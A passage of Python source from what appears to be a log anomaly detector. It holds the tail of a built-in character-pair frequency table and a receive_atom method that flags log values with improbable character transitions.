["h", 5152], ["k", 34], ["m", 374], ["l", 166], ["o", 4132], ["n", 120], ["q", 44], ["p", 776], ["s", 2], ["u", 1246], ["t", 1564], ["w", 144], ["v", 8], ["y", 126], ["z", 18]]], ["W", [["!", 2], [" ", 58], [")", 2], [",", 10], [".", 28], ["A", 136], ["E", 96], ["D", 4], ["G", 2], ["I", 90], ["H", 128], ["L", 4], ["O", 76], ["N", 12], ["S", 2], ["R", 8], ["Y", 4], ["a", 1096], ["e", 4362], ["i", 2096], ["h", 10098], ["o", 1611], ["r", 58], ["u", 18]]], ["[", [["*", 2], ["1", 112], ["3", 56], ["2", 112], ["5", 30], ["4", 40], ["7", 4], ["6", 34], ["9", 4], ["8", 2], ["A", 12], ["C", 2], ["B", 6], ["E", 24], ["D", 4], ["G", 14], ["F", 2], ["I", 22], ["H", 30], ["J", 34], ["M", 28], ["L", 16], ["N", 4], ["P", 42], ["S", 6], ["R", 36], ["T", 18], ["W", 4], ["a", 2], ["b", 4], ["d", 2], ["g", 2], ["f", 14], ["m", 2], ["l", 4], ["o", 4], 
["p", 6], ["s", 4], ["t", 50]]], ["_", [[" ", 100], ["'", 2], ["-", 12], [",", 38], [".", 28], [";", 4], ["A", 14], ["D", 2], ["I", 30], ["H", 4], ["M", 4], ["L", 2], ["O", 2], ["N", 2], ["T", 12], ["_", 736], ["^", 6], ["a", 14], ["c", 12], ["b", 4], ["e", 6], ["d", 6], ["f", 14], ["i", 4], ["h", 2], ["m", 8], ["l", 6], ["o", 2], ["n", 14], ["p", 4], ["s", 10], ["r", 2], ["u", 4], ["t", 10], ["w", 8], ["v", 4], ["y", 4], ["x", 4]]], ["c", [["!", 38], [" ", 2940], ["\"", 6], ["'", 62], ["-", 122], [",", 498], [".", 480], [";", 56], [":", 18], ["?", 22], ["C", 8], ["G", 8], ["F", 2], ["L", 230], ["Q", 2], ["P", 2], ["S", 2], ["a", 38996], ["c", 5012], ["e", 54872], ["d", 38], ["i", 13186], ["h", 55038], ["k", 20111], ["m", 4], ["l", 12408], ["o", 57624], ["n", 26], ["q", 496], ["p", 66], ["s", 944], ["r", 13732], ["u", 9748], ["t", 19868], ["w", 8], ["v", 6], ["y", 1692], ["z", 12]]], ["g", [["!", 572], [" ", 77496], ["\"", 32], ["'", 490], [")", 44], ["-", 1388], [",", 8820], [".", 5284], [";", 654], [":", 276], ["?", 530], [">", 4], ["a", 16556], ["c", 8], ["b", 10], ["e", 31120], ["d", 134], ["g", 3662], ["f", 14], ["i", 11514], ["h", 36708], ["m", 368], ["l", 8714], ["o", 16464], ["n", 4300], ["p", 22], ["s", 6714], ["r", 16774], ["u", 6849], ["t", 1104], ["w", 42], ["y", 516], ["z", 14], ["}", 8]]], ["k", [["!", 306], [" ", 20132], ["\"", 14], ["'", 392], [")", 32], ["-", 554], [",", 4148], [".", 2414], ["1", 2], [";", 294], [":", 60], ["?", 214], [">", 10], ["@", 10], ["a", 870], ["c", 66], ["b", 38], ["e", 34087], ["d", 24], ["g", 58], ["f", 344], ["i", 13220], ["h", 948], ["k", 244], ["j", 22], ["m", 100], ["l", 2880], ["o", 816], ["n", 11134], ["q", 2], ["p", 12], ["s", 4228], ["r", 68], ["u", 68], ["t", 20], ["w", 314], ["v", 10], ["y", 768], ["z", 2]]], ["o", [["!", 648], [" ", 114177], ["\"", 18], ["'", 1162], [")", 38], ["-", 958], [",", 5210], [".", 2232], [";", 354], [":", 58], ["?", 516], ["K", 2], ["J", 2], ["]", 4], ["_", 6], ["a", 7834], ["`", 2], 
["c", 9710], ["b", 5854], ["e", 2996], ["d", 16602], ["g", 5294], ["f", 99287], ["i", 10524], ["h", 872], ["k", 14852], ["j", 986], ["m", 51326], ["l", 30027], ["o", 36626], ["n", 131194], ["q", 172], ["p", 16136], ["s", 26802], ["r", 99219], ["u", 128095], ["t", 47116], ["w", 48246], ["v", 20522], ["y", 3366], ["x", 840], ["z", 456], ["}", 2]]], ["s", [["!", 2144], [" ", 245069], ["\"", 154], ["'", 1554], [")", 266], ["*", 14], ["-", 1948], [",", 37726], [".", 19990], ["1", 4], [";", 3000], [":", 928], ["=", 2], ["?", 1424], [">", 50], ["[", 6], ["]", 38], ["_", 24], ["a", 37342], ["c", 11410], ["b", 1092], ["e", 89922], ["d", 372], ["g", 288], ["f", 1206], ["i", 41018], ["h", 48184], ["k", 7002], ["j", 20], ["m", 5638], ["l", 7892], ["o", 41490], ["n", 2836], ["q", 1070], ["p", 17022], ["s", 38918], ["r", 118], ["u", 22362], ["t", 98283], ["w", 5082], ["v", 104], ["y", 2112], ["z", 8]]], ["w", [["!", 302], [" ", 25552], ["\"", 32], ["'", 332], [")", 38], ["-", 630], [",", 4620], ["/", 2], [".", 2130], [";", 296], [":", 56], ["?", 312], [">", 6], ["_", 4], ["a", 69912], ["c", 62], ["b", 88], ["e", 43746], ["d", 980], ["g", 230], ["f", 300], ["i", 50742], ["h", 55558], ["k", 232], ["j", 2], ["m", 12], ["l", 1768], ["o", 28157], ["n", 11280], ["p", 14], ["s", 3452], ["r", 3078], ["u", 116], ["t", 106], ["w", 8], ["y", 240], ["z", 2]]], ["{", [["`", 2], ["c", 2], ["E", 2], ["G", 2], ["s", 6], ["o", 4], ["1", 224], ["3", 226], ["2", 230], ["5", 24], ["4", 34], ["7", 22], ["6", 22], ["9", 22], ["8", 24], ["t", 8]]], ["\"", [[" ", 19496], ["\"", 12], ["'", 120], [")", 34], ["*", 70], ["-", 198], [",", 42], [".", 98], ["1", 4], ["3", 2], ["2", 4], ["5", 4], ["4", 4], ["6", 2], ["8", 6], [";", 74], [":", 2], ["?", 4], ["A", 4542], ["C", 1250], ["B", 2388], ["E", 472], ["D", 1474], ["G", 1096], ["F", 924], ["I", 8984], ["H", 2746], ["K", 138], ["J", 270], ["M", 1850], ["L", 912], ["O", 1848], ["N", 2630], ["Q", 110], ["P", 880], ["S", 1906], ["R", 350], ["U", 236], ["T", 
5524], ["W", 6722], ["V", 340], ["Y", 4228], ["X", 4], ["[", 14], ["Z", 6], ["]", 8], ["_", 20], ["a", 732], ["`", 158], ["c", 118], ["b", 452], ["e", 46], ["d", 138], ["g", 54], ["f", 182], ["i", 408], ["h", 256], ["k", 10], ["j", 14], ["m", 148], ["l", 118], ["o", 112], ["n", 94], ["q", 4], ["p", 130], ["s", 230], ["r", 36], ["u", 32], ["t", 1014], ["w", 398], ["v", 22], ["y", 272]]], ["&", [["h", 2], ["c", 8], [" ", 26]]], ["*", [[" ", 206], ["\"", 146], [")", 6], ["*", 636], [",", 12], [".", 4], [":", 8], [">", 2], ["A", 16], ["C", 4], ["B", 16], ["E", 20], ["D", 8], ["G", 2], ["F", 12], ["I", 6], ["H", 4], ["K", 4], ["L", 4], ["O", 6], ["N", 2], ["P", 2], ["S", 16], ["T", 92], ["W", 18], ["V", 14], ["Y", 2], ["[", 36], ["]", 54], ["n", 6]]], [".", [["!", 36], [" ", 88376], ["\"", 12990], ["'", 1624], [")", 132], ["(", 2], ["*", 27], ["-", 436], [",", 236], [".", 4176], ["0", 16], ["2", 8], ["4", 6], ["7", 2], ["6", 2], ["9", 14], [";", 20], [":", 166], ["?", 38], ["A", 46], ["C", 12], ["B", 12], ["E", 20], ["D", 4], ["G", 22], ["F", 12], ["I", 138], ["H", 38], ["K", 2], ["J", 2], ["M", 34], ["L", 10], ["O", 10], ["N", 20], ["Q", 2], ["P", 8], ["S", 38], ["R", 2], ["U", 4], ["T", 108], ["W", 42], ["V", 6], ["Y", 20], ["[", 26], ["]", 10], ["_", 8], ["a", 4], ["`", 6], ["c", 32], ["b", 2], ["e", 36], ["i", 16], ["m", 26], ["o", 2], ["s", 4], ["u", 24], ["t", 40], ["x", 10], ["z", 2]]], ["2", [[" ", 128], ["\"", 2], ["'", 6], [")", 12], ["*", 6], ["-", 20], [",", 132], ["/", 2], [".", 82], ["1", 127], ["0", 229], ["3", 90], ["2", 98], ["5", 112], ["4", 96], ["7", 78], ["6", 88], ["9", 51], ["8", 80], [";", 4], [":", 56], ["@", 14], ["]", 70], ["d", 6], ["n", 28], ["t", 20], ["}", 20], ["|", 66]]], ["6", [[" ", 60], ["-", 12], [",", 70], ["/", 2], [".", 30], ["1", 24], ["0", 76], ["3", 14], ["2", 34], ["5", 26], ["4", 19], ["7", 26], ["6", 32], ["9", 21], ["8", 22], [";", 10], [":", 32], ["?", 2], ["@", 10], ["]", 44], ["m", 4], ["t", 68], ["}", 18], ["|", 52]]], 
[":", [[" ", 3056], ["\"", 2], ["'", 20], [")", 2], ["(", 8], ["*", 2], ["-", 1142], [".", 260], ["1", 118], ["I", 4], ["3", 44], ["2", 90], ["5", 14], ["4", 30], ["7", 14], ["6", 16], ["9", 12], ["8", 12], ["R", 4], ["r", 4]]], [">", [[" ", 88], ["#", 2], ["\"", 4], ["$", 2], ["-", 2], [",", 2], [":", 2], ["<", 24], ["A", 2], ["@", 2], ["C", 2], ["F", 8], ["I", 10], ["M", 2], ["L", 2], ["T", 14], ["W", 4], ["_", 2], ["^", 2], ["a", 6], ["c", 8], ["f", 10], ["i", 12], ["h", 6], ["m", 8], ["o", 8], ["p", 2], ["s", 8], ["t", 8], ["w", 6], ["v", 2], ["{", 2]]], ["B", [[" ", 16], ["'", 2], [",", 4], [".", 12], ["A", 44], ["C", 38], ["B", 6], ["E", 200], ["I", 62], ["K", 702], ["M", 6], ["L", 69], ["O", 247], ["S", 8], ["R", 26], ["U", 52], ["Y", 62], ["a", 2602], ["e", 3594], ["i", 1068], ["h", 100], ["j", 2], ["l", 520], ["o", 2392], ["r", 974], ["u", 8016], ["w", 2], ["y", 828]]], ["F", [["A", 194], [" ", 300], ["E", 36], ["F", 18], ["I", 98], ["j", 2], ["l", 372], ["O", 166], [",", 2], [">", 2], ["i", 958], ["r", 5046], ["U", 14], ["o", 3334], ["a", 2482], ["e", 430], ["R", 78], [".", 10], ["u", 184], ["L", 20], ["T", 30]]], ["J", [["A", 18], ["a", 1388], ["E", 82], ["d", 2], ["'", 2], ["I", 2], ["-", 2], ["o", 2830], [".", 132], ["i", 314], ["s", 2], ["U", 30], ["O", 54], ["e", 1904], ["u", 1679]]], ["N", [["!", 6], [" ", 451], ["\"", 8], ["'", 28], ["-", 4], [",", 48], [".", 96], [";", 2], [":", 8], ["?", 2], ["A", 108], ["C", 124], ["B", 48], ["E", 247], ["D", 328], ["G", 216], ["F", 2], ["I", 92], ["H", 2], ["K", 22], ["J", 2], ["L", 4], ["O", 186], ["N", 40], ["S", 124], ["R", 13], ["U", 20], ["T", 298], ["V", 13], ["Y", 14], ["a", 3392], ["e", 2202], ["i", 1384], ["o", 4850], ["u", 72]]], ["R", [["!", 2], [" ", 2352], ["\"", 4], ["'", 20], ["*", 6], ["-", 4], [",", 78], [".", 718], [":", 2], ["?", 2], ["A", 178], ["C", 20], ["B", 12], ["E", 320], ["D", 100], ["G", 68], ["F", 4], ["I", 219], ["K", 70], ["M", 30], ["L", 42], ["O", 189], ["N", 84], ["Q", 2], 
["P", 18], ["S", 90], ["R", 70], ["U", 34], ["T", 272], ["W", 16], ["V", 14], ["Y", 93], ["a", 374], ["e", 1237], ["i", 323], ["h", 52], ["o", 2304], ["u", 2014], ["t", 2], ["y", 20]]], ["V", [["A", 47], ["a", 1798], ["B", 2], ["E", 276], ["'", 2], [" ", 18], ["I", 587], ["-", 2], [",", 12], ["O", 26], ["l", 30], ["i", 510], ["r", 4], ["U", 2], ["o", 228], ["y", 26], ["e", 465], ["R", 22], [".", 162], ["u", 4], ["Y", 6]]], ["Z", [["a", 32], ["\"", 2], ["E", 16], ["d", 4], ["I", 2], ["h", 68], [",", 4], ["o", 22], ["n", 30], ["i", 26], ["u", 10], ["O", 4], ["e", 124]]], ["b", [["!", 40], [" ", 1058], ["'", 68], [")", 4], ["*", 4], ["-", 98], [",", 414], [".", 244], [";", 24], [":", 6], ["?", 36], [">", 4], ["a", 13924], ["c", 22], ["b", 1618], ["e", 60104], ["d", 78], ["g", 4], ["f", 16], ["i", 6998], ["h", 46], ["j", 990], ["m", 324], ["l", 22082], ["o", 19980], ["n", 44], ["s", 2992], ["r", 13256], ["u", 20366], ["t", 1570], ["w", 30], ["v", 88], ["y", 13906]]], ["f", [["!", 178], [" ", 90391], ["\"", 8], ["'", 72], [")", 16], ["*", 2], ["-", 876], [",", 2770], [".", 1846], [";", 240], [":", 102], ["?", 144], ["G", 2], ["I", 2], ["a", 20108], ["c", 14], ["b", 38], ["e", 23990], ["d", 2], ["g", 10], ["f", 10886], ["i", 22788], ["h", 6], ["k", 12], ["j", 16], ["m", 12], ["l", 7808], ["o", 46468], ["n", 16], ["p", 2], ["s", 464], ["r", 21052], ["u", 10540], ["t", 10202], ["w", 62], ["v", 2], ["y", 396], ["x", 2]]], ["j", [["a", 724], ["!", 2], ["e", 4002], ["'", 2], ["i", 118], ["o", 3558], [".", 4], ["u", 4654]]], ["n", [["!", 1140], [" ", 164227], ["\"", 84], ["'", 9982], [")", 108], ["*", 6], ["-", 2184], [",", 19804], [".", 11592], [";", 1670], [":", 478], ["?", 1178], [">", 50], ["J", 4], ["]", 18], ["_", 4], ["a", 17316], ["c", 30762], ["b", 372], ["e", 74881], ["d", 155134], ["g", 116276], ["f", 3720], ["i", 23814], ["h", 996], ["k", 7828], ["j", 896], ["m", 518], ["l", 7014], ["o", 57750], ["n", 7832], ["q", 950], ["p", 298], ["s", 29725], ["r", 506], ["u", 
4864], ["t", 72732], ["w", 558], ["v", 3580], ["y", 9090], ["x", 498], ["z", 154], ["}", 4]]], ["r", [["!", 1102], [" ", 128583], ["\"", 78], ["'", 2438], [")", 108], ["*", 14], ["-", 2050], [",", 18518], [".", 12898], [";", 1346], [":", 332], ["?", 1112], [">", 28], ["A", 2], ["@", 14], ["_", 6], ["a", 45838], ["c", 7992], ["b", 2520], ["e", 175663], ["d", 22490], ["g", 6450], ["f", 3064], ["i", 57977], ["h", 1474], ["k", 6764], ["j", 14], ["m", 12284], ["l", 8396], ["o", 61720], ["n", 15999], ["q", 220], ["p", 3358], ["s", 36440], ["r", 17042], ["u", 12282], ["t", 29678], ["w", 1522], ["v", 4906], ["y", 24200], ["x", 6], ["z", 128]]], ["v", [["!", 34], [" ", 1478], ["'", 360], [")", 2], ["-", 58], [",", 566], [".", 316], [";", 12], [":", 4], ["?", 30], ["_", 2], ["a", 8210], ["e", 85189], ["g", 2], ["i", 17242], ["k", 2], ["m", 16], ["l", 218], ["o", 6350], ["n", 508], ["s", 216], ["r", 658], ["u", 248], ["t", 4], ["v", 22], ["y", 640]]], ["z", [["!", 8], [" ", 344], ["\"", 2], ["'", 14], [")", 4], ["-", 40], [",", 172], [".", 178], [";", 8], [":", 2], ["?", 22], ["a", 592], ["b", 6], ["e", 3788], ["d", 18], ["g", 8], ["i", 920], ["h", 122], ["k", 6], ["m", 104], ["l", 356], ["o", 1122], ["n", 2], ["s", 6], ["r", 2], ["u", 156], ["v", 14], ["y", 202], ["z", 622]]], ["~", [[")", 6]]], ["\t", [["\t", 174], [" ", 136], ["D", 2]]], ["!", [["!", 12], [" ", 7580], ["\"", 6860], ["'", 556], [")", 42], ["*", 12], ["-", 108], [",", 4], [".", 170], ["I", 2], ["v", 6], ["[", 2], ["_", 6]]], ["%", [[" ", 8]]], [")", [[" ", 830], ["-", 56], [",", 506], [".", 102], ["5", 2], ["[", 2], [":", 16], [";", 58], ["?", 2]]], ["-", [["!", 8], [" ", 5090], ["\"", 550], ["'", 68], ["(", 2], ["+", 4], ["-", 6008], [",", 22], [".", 2], ["1", 12], ["2", 16], ["5", 24], ["4", 2], ["7", 4], ["6", 6], ["8", 4], ["?", 22], ["A", 170], ["C", 118], ["B", 200], ["E", 88], ["D", 116], ["G", 118], ["F", 62], ["I", 194], ["H", 172], ["K", 16], ["J", 90], ["M", 196], ["L", 74], ["O", 38], ["N", 44], 
["Q", 6], ["P", 134], ["S", 172], ["R", 44], ["T", 160], ["W", 74], ["V", 28], ["Y", 22], ["Z", 4], ["a", 1098], ["`", 16], ["c", 1092], ["b", 1366], ["e", 476], ["d", 942], ["g", 452], ["f", 1014], ["i", 408], ["h", 966], ["k", 224], ["j", 64], ["m", 808], ["l", 922], ["o", 468], ["n", 446], ["q", 40], ["p", 884], ["s", 1836], ["r", 562], ["u", 122], ["t", 1410], ["w", 812], ["v", 66], ["y", 140], ["z", 12]]], ["1", [[" ", 112], ["'", 4], [")", 16], ["*", 10], ["-", 14], [",", 112], ["/", 2], [".", 68], ["1", 246], ["0", 318], ["3", 164], ["2", 280], ["5", 224], ["4", 214], ["7", 188], ["6", 204], ["9", 126], ["8", 572], [";", 4], [":", 40], ["@", 4], ["O", 2], ["]", 48], ["s", 52], ["t", 22], ["}", 18], ["|", 88]]], ["5", [[" ", 98], ["\"", 2], ["'", 2], ["-", 4], [",", 88], [".", 46], ["1", 22], ["0", 140], ["3", 28], ["2", 32], ["5", 32], ["4", 22], ["7", 32], ["6", 16], ["9", 14], ["8", 18], [";", 10], [":", 48], ["?", 2], ["@", 14], ["]", 64], ["t", 82], ["}", 18], ["|", 44]]], ["9", [[" ", 74], ["'", 2], [")", 4], ["-", 6], [",", 40], [".", 22], ["1", 26], ["0", 43], ["3", 48], ["2", 14], ["5", 18], ["4", 15], ["7", 34], ["6", 20], ["9", 18], ["8", 10], [";", 12], [":", 38], ["@", 6], ["]", 44], ["t", 32], ["}", 18], ["|", 46]]], ["=", [["E", 2], ["=", 8], ["T", 14], [" ", 12]]], ["A", [[" ", 4464], ["\"", 2], ["'", 12], ["-", 18], [",", 4], [".", 24], ["A", 6], ["C", 108], ["B", 58], ["E", 22], ["D", 77], ["G", 50], ["F", 18], ["I", 98], ["H", 10], ["K", 18], ["M", 89], ["L", 220], ["N", 497], ["Q", 2], ["P", 2116], ["S", 220], ["R", 481], ["U", 44], ["T", 292], ["W", 18], ["V", 78], ["Y", 66], ["X", 6], ["Z", 2], ["a", 2], ["c", 208], ["b", 496], ["e", 2], ["d", 372], ["g", 352], ["f", 1144], ["i", 66], ["h", 554], ["k", 64], ["j", 4], ["m", 1358], ["l", 3042], ["o", 140], ["n", 12454], ["q", 4], ["p", 230], ["s", 2898], ["r", 1643], ["u", 754], ["t", 3060], ["w", 48], ["v", 60], ["y", 30], ["x", 2], ["z", 30]]], ["E", [["!", 20], [" ", 1253], ["\"", 2], 
["'", 18], ["*", 2], ["-", 14], [",", 30], [".", 100], [":", 8], ["?", 4], ["A", 176], ["C", 152], ["B", 30], ["E", 92], ["D", 166], ["G", 32], ["F", 34], ["I", 60], ["H", 6], ["K", 8], ["M", 80], ["L", 142], ["O", 14], ["N", 490], ["Q", 6], ["P", 124], ["S", 360], ["R", 730], ["U", 18], ["T", 184], ["W", 90], ["V", 102], ["Y", 34], ["X", 64], ["a", 450], ["c", 46], ["b", 14], ["d", 90], ["g", 62], ["f", 20], ["i", 64], ["h", 58], ["k", 6], ["m", 1500], ["l", 226], ["o", 4], ["n", 1398], ["q", 20], ["p", 138], ["s", 148], ["r", 118], ["u", 358], ["t", 98], ["v", 1326], ["y", 70], ["x", 298], ["z", 2], ["}", 2]]], ["I", [["!", 34], [" ", 40514], ["\"", 4], ["'", 2748], ["-", 52], [",", 526], [".", 576], [";", 42], [":", 6], ["?", 88], ["A", 76], ["C", 182], ["B", 47], ["E", 82], ["D", 78], ["G", 140], ["F", 78], ["I", 1054], ["K", 12], ["M", 76], ["L", 150], ["O", 134], ["N", 704], ["Q", 4], ["P", 18], ["S", 277], ["R", 122], ["U", 2], ["T", 378], ["V", 298], ["X", 156], ["Z", 8], ["_", 46], ["a", 2], ["c", 146], ["b", 10], ["d", 16], ["g", 48], ["f", 1944], ["m", 196], ["l", 216], ["o", 30], ["n", 5298], ["p", 28], ["s", 930], ["r", 122], ["t", 8656], ["v", 100], ["x", 2], ["z", 2]]], ["M", [["!", 4], [" ", 68], ["\"", 2], ["'", 12], ["-", 4], [",", 12], ["/", 8], [".", 1208], [":", 2], ["A", 346], ["C", 28], ["B", 34], ["E", 243], ["D", 6], ["G", 12], ["I", 130], ["M", 24], ["L", 2], ["O", 117], ["N", 16], ["P", 50], ["S", 26], ["R", 8], ["U", 28], ["W", 6], ["Y", 24], ["a", 8688], ["c", 378], ["e", 1576], ["f", 2], ["i", 2158], ["o", 4266], ["s", 2], ["r", 2578], ["u", 518], ["y", 1492]]], ["Q", [["U", 48], ["C", 2], ["u", 494], [".", 4]]], ["U", [["!", 2], [" ", 106], ["'", 6], [",", 2], [".", 10], ["A", 16], ["C", 48], ["B", 24], ["E", 54], ["D", 44], ["G", 12], ["F", 6], ["I", 12], ["K", 2], ["M", 60], ["L", 68], ["N", 116], ["P", 26], ["S", 130], ["R", 182], ["U", 2], ["T", 156], ["V", 2], ["Z", 6], ["c", 2], ["g", 12], ["h", 34], ["k", 4], ["m", 16], ["l", 
30], ["n", 859], ["p", 360], ["s", 32], ["r", 68], ["t", 50], ["v", 16]]], ["Y", [["!", 4], [" ", 260], ["\"", 2], ["'", 4], ["-", 68], [",", 10], [".", 22], [";", 2], ["A", 2], ["B", 2], ["E", 26], ["L", 4], ["O", 112], ["S", 26], ["R", 4], ["T", 2], ["a", 122], ["c", 2], ["e", 1328], ["i", 10], ["o", 3878], ["s", 10], ["u", 26], ["v", 8]]], ["]", [["!", 2], [" ", 322], ["J", 2], ["-", 2], [",", 44], [".", 14], [";", 24], [">", 2]]], ["a", [["!", 310], [" ", 65518], ["\"", 24], ["'", 716], [")", 20], ["*", 1], ["-", 724], [",", 2766], [".", 1558], ["1", 2], [";", 152], [":", 30], ["?", 144], [">", 2], ["S", 2], ["_", 6], ["a", 122], ["`", 6], ["c", 35608], ["b", 19042], ["e", 752], ["d", 56288], ["g", 18377], ["f", 7666], ["i", 47228], ["h", 1140], ["k", 13604], ["j", 480], ["m", 24754], ["l", 68865], ["o", 314], ["n", 216874], ["q", 102], ["p", 18548], ["s", 105951], ["r", 97182], ["u", 12725], ["t", 135418], ["w", 10880], ["v", 25744], ["y", 29029], ["x", 666], ["z", 1906], ["}", 2]]], ["e", [["!", 3010], [" ", 487805], ["\"", 166], ["'", 4249], [")", 336], ["*", 10], ["-", 4298], [",", 40540], [".", 24278], [";", 3704], [":", 890], ["?", 2866], [">", 78], ["B", 2], ["I", 2], ["S", 2], ["[", 6], ["]", 18], ["_", 42], ["a", 79086], ["`", 2], ["c", 27918], ["b", 1598], ["e", 45884], ["d", 142368], ["g", 8394], ["f", 13916], ["i", 18692], ["h", 2842], ["k", 1590], ["j", 380], ["m", 31126], ["l", 54118], ["o", 4898], ["n", 129345], ["q", 1706], ["p", 17078], ["s", 100714], ["r", 205409], ["u", 2658], ["t", 41944], ["w", 11422], ["v", 24561], ["y", 23800], ["x", 14052], ["z", 560], ["}", 4]]], ["i", [["!", 50], [" ", 1222], ["\"", 2], ["'", 184], [")", 4], ["*", 2], ["-", 384], [",", 450], [".", 254], [";", 14], [":", 6], ["?", 14], ["@", 2], ["G", 2], ["Y", 2], ["]", 2], ["_", 8], ["a", 10716], ["c", 45183], ["b", 6986], ["e", 33445], ["d", 40015], ["g", 26388], ["f", 17002], ["i", 24], ["h", 72], ["k", 7006], ["j", 18], ["m", 40198], ["l", 43870], ["o", 33038], 
["n", 232657], ["q", 394], ["p", 5884], ["s", 107323], ["r", 32008], ["u", 1844], ["t", 102683], ["w", 38], ["v", 16166], ["y", 2], ["x", 2074], ["z", 2892]]], ["m", [["!", 462], [" ", 35852], ["\"", 24], ["'", 294], [")", 58], ["-", 610], [",", 7564], [".", 6290], ["1", 2], [";", 758], [":", 298], ["?", 470], [">", 22], ["]", 2], ["a", 45673], ["c", 96], ["b", 7420], ["e", 83120], ["d", 36], ["g", 4], ["f", 768], ["i", 24836], ["h", 10], ["k", 22], ["m", 5770], ["l", 522], ["o", 32940], ["n", 1218], ["p", 15046], ["s", 8640], ["r", 202], ["u", 10278], ["t", 200], ["w", 24], ["y", 17480]]], ["q", [["a", 2], [" ", 2], ["u", 12073], [",", 2], ["'", 2]]], ["u", [["!", 428], [" ", 17752], ["\"", 16], ["'", 1182], [")", 6], ["-", 186], [",", 1924], [".", 1140], [";", 124], [":", 18], ["?", 428], ["S", 12], ["T", 2], ["_", 2], ["a", 6632], ["c", 12934], ["b", 5730], ["e", 10797], ["d", 6988], ["g", 18286], ["f", 2056], ["i", 9148], ["h", 30], ["k", 496], ["j", 84], ["m", 8440], ["l", 37068], ["o", 708], ["n", 43221], ["q", 64], ["p", 17232], ["s", 44836], ["r", 48568], ["u", 18], ["t", 49162], ["w", 10], ["v", 428], ["y", 210], ["x", 498], ["z", 722]]], ["y", [["!", 1032], [" ", 118640], ["\"", 62], ["'", 1440], [")", 154], ["-", 2010], [",", 18388], [".", 10860], [";", 1366], [":", 466], ["?", 946], [">", 26], ["]", 2], ["_", 4], ["a", 2624], ["`", 2], ["c", 242], ["b", 640], ["e", 11272], ["d", 206], ["g", 138], ["f", 198], ["i", 4422], ["h", 84], ["k", 76], ["m", 714], ["l", 818], ["o", 28106], ["n", 212], ["p", 410], ["s", 8723], ["r", 738], ["u", 58], ["t", 3028], ["w", 464], ["v", 110], ["x", 14], ["z", 40]]], ["}", [[" ", 6], [",", 2]]]]] # noqa: E501 for elem in default_f[2]: first_char = int.from_bytes(bytes(elem[0], AminerConfig.ENCODING), "big") second_char_list = elem[1] self.freq[first_char] = {} for second_char_elem in second_char_list: second_char = int.from_bytes(bytes(second_char_elem[0], AminerConfig.ENCODING), "big") frequency = second_char_elem[1] 
# --- tail of the detector's __init__ (its head, including the large built-in default frequency table, precedes
# this chunk). First the innermost statement of the loop that copies the default table into self.freq, then the
# persistence set-up. ---
self.freq[first_char][second_char] = frequency
# Load frequency table from persisted data. Note that this adds to entries in the default frequency table if used.
self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
PersistenceUtil.add_persistable_component(self)
self.load_persistence_data()


def receive_atom(self, log_atom) -> bool:
    """Receive a log atom from a source.

    The atom is skipped (False) when its source resource name is in log_resource_ignore_list, when one of
    ignore_list is among its parser paths or one of constraint_list is missing, or when none of target_path_list
    yields a value. Otherwise every value is scored by the mean transition probability of its character pairs
    (including virtual start/end markers) and reported when that score falls below prob_thresh; in learn mode the
    values then extend the frequency table.
    @param log_atom the log atom to analyze; its source, parser_match, raw_data and atom_time are used.
    @return True if the atom was analyzed, False if it was skipped.
    """
    for source in self.log_resource_ignore_list:
        if log_atom.source.resource_name.decode() == source:
            return False
    self.log_total += 1
    # stop_learning_time / stop_learning_no_anomaly_time are configured as relative offsets; on the first atom they are
    # turned into an absolute timestamp relative to that atom's time.
    if not self.stop_learning_time_initialized:
        self.stop_learning_time_initialized = True
        if self.stop_learning_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
        elif self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
    parser_match = log_atom.parser_match
    if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
        logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
        self.learn_mode = False
    # Skip atom when ignore paths in atom or constraint paths not in atom.
    all_paths_set = set(parser_match.get_match_dictionary().keys())
    if len(all_paths_set.intersection(self.ignore_list)) > 0 \
            or len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list):
        return False
    # Store all values from target target_path_list in a list.
    values = []
    all_values_none = True
    for path in self.target_path_list:
        match = parser_match.get_match_dictionary().get(path)
        if match is None:
            continue
        # A path may map to a single match element or to a list of them; normalise to a list.
        matches = []
        if isinstance(match, list):
            matches = match
        else:
            matches.append(match)
        for match in matches:
            value = match.match_object
            # Non-bytes match objects are analysed via their string form so that value[i] always yields byte values.
            if not isinstance(match.match_object, bytes):
                value = str(match.match_object).encode(AminerConfig.ENCODING)
            if value is not None:
                all_values_none = False
                values.append(value)
    if all_values_none is True:
        return False
    for value in values:
        probs = []
        # Iterate over all characters (+ virtual characters before and after value)
        # and check occurrence frequencies of ith and (i+1)th character
        for i in range(-1, len(value)):
            # Use -1 as placeholder for character before first actual character of value
            first_char = -1
            if i != -1:
                first_char = value[i]
            # Use -1 as placeholder for character after last actual character of value
            second_char = -1
            if i != len(value) - 1:
                second_char = value[i + 1]
            # Unseen pairs contribute probability 0, which pulls the critical value down.
            prob = 0
            if first_char in self.freq and second_char in self.freq[first_char]:
                # NOTE(review): total_freq[first_char] is assumed to be > 0 here; load_persistence_data() recomputes it
                # as the sum of the persisted counts, so persisted all-zero counts would raise ZeroDivisionError.
                prob = self.freq[first_char][second_char] / self.total_freq[first_char]
            probs.append(prob)
        # len(probs) == len(value) + 1 >= 1, so this never divides by zero.
        critical_val = sum(probs) / len(probs)
        if critical_val < self.prob_thresh:
            try:
                data = log_atom.raw_data.decode(AminerConfig.ENCODING)
            except UnicodeError:
                data = repr(log_atom.raw_data)
            if self.output_logline:
                original_log_line_prefix = self.aminer_config.config_properties.get(
                    CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data]
            else:
                sorted_log_lines = [data]
            # NOTE(review): unlike raw_data above, value.decode() is not guarded by try/except; a bytes match_object that
            # is not valid in AminerConfig.ENCODING would raise here instead of being reported.
            analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": [value.decode(AminerConfig.ENCODING)],
                                  "CriticalValue": critical_val, "ProbabilityThreshold": self.prob_thresh}
            event_data = {"AnalysisComponent": analysis_component}
            for listener in self.anomaly_event_handlers:
